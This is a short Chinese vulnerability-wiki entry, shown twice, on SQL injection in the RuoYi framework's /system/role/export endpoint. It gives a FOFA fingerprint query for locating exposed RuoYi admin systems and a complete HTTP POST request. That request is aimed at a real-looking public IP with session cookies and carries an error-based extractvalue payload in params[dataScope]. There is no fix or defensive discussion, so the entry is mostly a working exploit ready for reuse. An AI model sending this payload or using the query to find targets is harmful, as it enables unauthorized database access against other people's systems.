fofamini-wiki

登录白背景

源码

若依快速开发框架export存在sql注入漏洞

一、漏洞简介

ruoyi是一套基于java开发的轻量级开源快速开发框架，采用Spring Boot+Spring Security+MybatisPlus框架技术。ruoyi框架内部采用分模块设计，代码清晰简单易于维护，同时提供多种组件，如代码生成、前后端分离、数据权限管理等，可以快速开发出完整的项目。若依快速开发框架export存在sql注入漏洞

二、影响版本

ruoyi

三、资产测绘

app="若依-管理系统"

四、漏洞复现

POST /system/role/export HTTP/1.1
Cookie: b-user-id=3fb562ab-372b-aaaf-344c-b2749df5a18e; JSESSIONID=0c074950-06a0-4f68-b7d5-9d1bc33d22bf
Host: 47.92.253.74:8088
Content-Length: 179
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36

params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))

原文: https://www.yuque.com/xiaokp7/ocvun2/fa33z5wlz3h1s5ub

# 若依快速开发框架export存在sql注入漏洞

# 一、漏洞简介
ruoyi是一套基于java开发的轻量级开源快速开发框架，采用Spring Boot+Spring Security+MybatisPlus框架技术。ruoyi框架内部采用分模块设计，代码清晰简单易于维护，同时提供多种组件，如代码生成、前后端分离、数据权限管理等，可以快速开发出完整的项目。若依快速开发框架export存在sql注入漏洞

# 二、影响版本
+ ruoyi

# 三、资产测绘
```plain
app="若依-管理系统"
```

![1721639324402-8114ae2f-0e23-4dff-b4a8-c3e488a0f08f.png](./img/5o_VOs81GY7cUPnu/1721639324402-8114ae2f-0e23-4dff-b4a8-c3e488a0f08f-734902.png)

# 四、漏洞复现
```http
POST /system/role/export HTTP/1.1
Cookie: b-user-id=3fb562ab-372b-aaaf-344c-b2749df5a18e; JSESSIONID=0c074950-06a0-4f68-b7d5-9d1bc33d22bf
Host: 47.92.253.74:8088
Content-Length: 179
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36

params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))
```

![1721641976272-f0d12da6-6af7-4be1-873f-47073852ed2b.png](./img/5o_VOs81GY7cUPnu/1721641976272-f0d12da6-6af7-4be1-873f-47073852ed2b-964393.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fa33z5wlz3h1s5ub>